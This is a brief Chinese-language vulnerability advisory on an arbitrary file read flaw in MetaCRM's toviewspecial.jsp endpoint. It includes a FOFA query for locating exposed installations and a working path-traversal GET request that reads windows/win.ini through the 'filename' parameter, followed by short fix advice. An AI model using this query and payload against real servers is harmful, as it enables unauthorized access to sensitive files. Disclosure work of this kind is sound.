漏洞信息
| 项目 | 内容 |
|---|---|
| 漏洞名称 | MetaCRM美特crm系统toviewspecial.jsp接口任意文件读取漏洞 |
| 漏洞类型 | 任意文件读取 |
| 影响组件 | toviewspecial.jsp |
| 影响版本 | MetaCRM美特crm |
漏洞概述
MetaCRM美特crm系统toviewspecial.jsp接口存在任意文件读取漏洞,攻击者可通过构造恶意请求读取服务器敏感文件。
fofa查询语句
body="/common/scripts/basic.js" && body="www.metacrm.com.cn"
漏洞复现
POC
GET /toviewspecial.jsp?filename=../../../../../../../../../../windows/win.ini HTTP/1.1
Host: target.com
漏洞特征
- 路径:/toviewspecial.jsp
- 参数:filename
- HTTP方法:GET
修复建议
- 打补丁
- 严格限制文件路径访问
- 增加权限控制
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END









暂无评论内容